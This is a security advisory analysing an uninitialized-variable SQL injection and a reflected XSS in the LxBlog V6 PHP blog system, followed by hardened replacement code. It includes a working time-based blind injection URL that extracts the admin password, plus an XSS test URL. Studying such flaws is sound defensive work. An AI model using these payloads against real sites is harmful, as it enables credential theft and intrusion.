Analysis of the LxBlog V6 uninitialized-variable vulnerability - Vulnerability Warning - the black bar safety net

2009-03-17T00:00:00
ID MYHACK58:62200922552
Type myhack58
Reporter Anonymous (佚名)
Modified 2009-03-17T00:00:00

Description

Flyh4t http://bbs.wolvez.org

This article was published in Hacker Defense (黑客防线); please credit the author when reproducing it.

Lxblog is a multi-user blog system developed by PHPWind on a PHP+MySQL platform. It emphasizes interaction between the whole site and individual users, and offers a strong profile system, an independent second-level domain name system, a flexible user template system, a rich friend-circle feature and photo albums. Its security, however, is less satisfactory: this article analyzes an SQL injection vulnerability in lxblog caused by an uninitialized variable.

Let us start with the vulnerable code:

```php
// user/tag.php
<?php
!function_exists('usermsg') && exit('Forbidden');
!in_array($type, $item_type) && exit;   // neither $type nor $item_type is initialized
require_once(R_P.'mod/charset_mod.php');
foreach ($_POST as $key => $value) {
    ${'utf8'.$key} = $value;
    ${$key} = $db_charset != 'utf-8' ? convert_charset('utf-8', $db_charset, $value) : $value;
}

if ($job == 'add') {
    ...... // omitted part of the code
} elseif ($job == "modify") {
    $tagnum = "{$type}num";
    // $type is interpolated straight into the query sent to the database
    $touchtagdb = $db->get_one("SELECT k.tags,i.uid FROM pw_{$type} k LEFT JOIN pw_items i ON i.itemid=k.itemid WHERE k.itemid='$itemid'");
    $touchtagdb['uid'] != $admin_uid && exit;
    ...... // omitted part of the code
```

Of course, the first line of the file, `!function_exists('usermsg') && exit('Forbidden');`, prevents the file from being requested directly. It can, however, be reached by having user_index.php include it. The relevant code is:

```php
// user_index.php
<?php
...... // omitted part of the code
require_once(R_P.'user/global.php');
require_once(R_P.'user/top.php');

if (!$action) {
    ...... // omitted part of the code
} elseif ($action && file_exists(R_P."user/$action.php")) {
    $basename = "$user_file?action=$action";
    require_once(Pcv(R_P."user/$action.php"));   // submitting action=tag includes the vulnerable file
}
...... // omitted part of the code
```

At this point the vulnerability should already be reachable, but we still have to consider whether register_globals gets in the way. Fortunately user_index.php includes user/global.php at the very beginning, so let us look at what that file gives us:

```php
// user/global.php
<?php
...... // omitted part of the code
if (!in_array($action, array('blogdata','comment','itemcp','post','userinfo'))) {
    // 'blogdata','comment','itemcp','post','userinfo','global','top'
    // Our action=tag is not in the array above, so the loops below run and copy
    // every request parameter into a global variable, which removes the
    // dependency on register_globals
    foreach ($_POST as $_key => $_value) {
        !ereg('^\_', $_key) && strlen(${$_key}) < 1 && ${$_key} = $_POST[$_key];
    }
    foreach ($_GET as $_key => $_value) {
        !ereg('^\_', $_key) && strlen(${$_key}) < 1 && ${$_key} = $_GET[$_key];
    }
}
...... // omitted part of the code
```

From the analysis above we can fully control the values of `$type` and `$item_type`. Two details still need attention:

First, the check `in_array($type, $item_type)` must pass. We satisfy it by passing `$type` and `$item_type[]` directly in the request, assigning the same value to both.

Second, the statement we are injecting into is:

```php
$touchtagdb = $db->get_one("SELECT k.tags,i.uid FROM pw_{$type} k LEFT JOIN pw_items i ON i.itemid=k.itemid WHERE k.itemid='$itemid'");
```

Based on the above, we construct the following blind-injection request:

```
// Determine whether the ASCII value of the first character of the uid=1 user's password is greater than 0
http://blog.xxx.com/user_index.php?action=tag&job=modify&type=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid=1 AND if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*&item_type[]=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid=1 AND if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*
```

Whether the guess is correct is determined from the browser's response time: if it is correct, the response is noticeably slower and the browser appears to hang; otherwise it returns normally. Repeating this with a binary search recovers the value. If the database version is older, the benchmark function can be used for the blind injection instead. No exploit is provided here; anyone who needs one can write the code themselves, it is not difficult.

In addition, let us look at lxblog's database error-handling code:

```php
function DB_ERROR($msg) {
    global $db_blogname, $REQUEST_URI;
    $sqlerror = mysql_error();
    $sqlerrno = mysql_errno();
    //ob_end_clean();
    echo "<html><head><title>$db_blogname</title><style type='text/css'>P,BODY{FONT-FAMILY:tahoma,arial,sans-serif;FONT-SIZE:11px;}A { TEXT-DECORATION: none;}a:hover{ text-decoration: underline;}TD { BORDER-RIGHT: 1px; BORDER-TOP: 0px; FONT-SIZE: 16pt; COLOR: #000000;}</style><body>\n\n";
    echo "<table style='TABLE-LAYOUT:fixed;WORD-WRAP: break-word'><tr><td>$msg";
    echo "<br><br><b>The URL Is</b>:<br>http://$_SERVER[HTTP_HOST]$REQUEST_URI";
    echo "<br><br><b>MySQL Server Error</b>:<br>$sqlerror ( $sqlerrno )";
    echo "<br><br><b>You Can Get Help In</b>:<br><a target=_blank href=http://www.phpwind.net><b>http://www.phpwind.net</b></a>";
    echo "</td></tr></table>";
    exit;
}
```

The function writes the URL that caused the database error straight back to the client without any output filtering, which results in an XSS vulnerability. Below is my test against the official site:

```
http://www.lxblog.net/user_index.php?action=tag&job=modify&type=<script>alert(/xss/)</script>&item_type[]=<script>alert(/xss/)</script>
```
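The XSS in DB_ERROR() exists because `$msg`, the request URI and the raw MySQL error text are echoed into HTML unescaped. The following is an added example of a hardened handler, written for this article and not LxBlog's or PHPWind's own code; the function name `db_error_safe` and its parameter list are assumptions made here so that the function can be called without a live database connection. Every dynamic value is passed through `htmlspecialchars()`, and the MySQL error message goes to the server log instead of the client.

```php
<?php
// Added example, not LxBlog's own code: a hardened replacement for DB_ERROR().
// Parameters are passed in explicitly (assumption) so the function can be
// exercised without a real mysql_error()/mysql_errno() result.
function db_error_safe($msg, $sqlerror, $sqlerrno, $db_blogname, $request_uri) {
    // Escape once, at output time, for an HTML context.
    $h = function ($s) {
        return htmlspecialchars((string)$s, ENT_QUOTES, 'UTF-8');
    };

    // Keep the detailed MySQL error server-side; the client gets only the error code.
    error_log("MySQL error $sqlerrno at $request_uri: $sqlerror");

    $host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '';

    $out  = "<html><head><title>" . $h($db_blogname) . "</title></head><body>\n";
    $out .= "<p>" . $h($msg) . "</p>\n";
    $out .= "<p><b>The URL Is</b>: http://" . $h($host) . $h($request_uri) . "</p>\n";
    $out .= "<p><b>Database error</b>: code " . (int)$sqlerrno . "</p>\n";
    $out .= "<p><b>You Can Get Help In</b>: <a target=\"_blank\" href=\"http://www.phpwind.net\">http://www.phpwind.net</a></p>\n";
    $out .= "</body></html>";
    return $out;
}

// Constructed input mirroring the page's test payload: the <script> tag is
// rendered as text (&lt;script&gt;...) instead of being executed.
$payload = '<script>alert(/xss/)</script>';
echo db_error_safe(
    'Query failed',
    "Table 'pw_" . $payload . "' doesn't exist",
    1146,
    'demo blog',
    '/user_index.php?action=tag&job=modify&type=' . $payload
);
```

The key change is that the page's error handler treated user-controlled strings as trusted HTML; the replacement treats them as text and escapes at the point of output, which is the only place where the output context (HTML here) is known.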

That concludes the analysis of the lxblog vulnerability. The fix is simple: assign `$item_type` the intended fixed array before the database query is built. Many PHP applications online have similar vulnerabilities: because a variable is not correctly initialized, an attacker can control it and alter the program's execution flow to perform illegal operations. The problem itself is not complex; good coding habits and proper initialization of classes and variables are enough to eliminate this kind of vulnerability.
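To make the fix concrete, the following is an added example of a hardened prologue for user/tag.php, written for this article and not LxBlog's or PHPWind's own code. It applies the points from the analysis: `$item_type` is a fixed whitelist set in the script rather than taken from the request, `$type`, `$job` and `$itemid` are read explicitly so the register_globals emulation in user/global.php has nothing left to fill in, and the query is only built for a whitelisted table name and an integer id. The whitelist contents are an assumption (the page only shows `blog` as a valid type), as is the helper name `build_tag_query`.

```php
<?php
// Added example, not LxBlog's own code: hardened prologue for user/tag.php.

// Fixed whitelist of pw_* item tables (assumed; the page only mentions 'blog').
// Because it is assigned here, no request parameter can set or extend it.
$item_type = array('blog');

// Read each input the handler needs explicitly from the request. Nothing is
// left uninitialized, so neither register_globals nor the foreach emulation in
// user/global.php can pre-populate these variables.
$type   = isset($_REQUEST['type'])   ? (string)$_REQUEST['type'] : '';
$job    = isset($_REQUEST['job'])    ? (string)$_REQUEST['job']  : '';
$itemid = isset($_REQUEST['itemid']) ? (int)$_REQUEST['itemid']  : 0;

// Build the tag lookup query only for a whitelisted table name and a numeric id.
// Returns null when the type is not allowed so the caller can exit cleanly.
function build_tag_query($type, $itemid, array $item_type) {
    // Strict comparison: a type that is not literally in the whitelist is rejected,
    // so the "blog k LEFT JOIN ..." string from the page never reaches the SQL.
    if (!in_array($type, $item_type, true)) {
        return null;
    }
    // Item ids are numeric; casting removes the need to quote and escape them.
    $itemid = (int)$itemid;
    return "SELECT k.tags,i.uid FROM pw_{$type} k "
         . "LEFT JOIN pw_items i ON i.itemid=k.itemid "
         . "WHERE k.itemid={$itemid}";
}

$sql = build_tag_query($type, $itemid, $item_type);
if ($sql === null) {
    exit;
}
// $touchtagdb = $db->get_one($sql); would follow here in the real handler.

// Constructed checks: the page's injection value is rejected, a valid type is accepted.
var_dump(build_tag_query("blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid=1 /*", 1, $item_type)); // NULL
var_dump(build_tag_query('blog', 1, $item_type)); // "SELECT k.tags,i.uid FROM pw_blog k ... WHERE k.itemid=1"
```

Table names cannot be bound as prepared-statement parameters, so a whitelist is the right control for `$type`; the integer cast covers `$itemid`, which was previously quoted but not escaped. Initializing `$item_type` before the check is what closes the vulnerability described on this page; reading inputs explicitly is what prevents the same class of bug from reappearing through the global.php emulation.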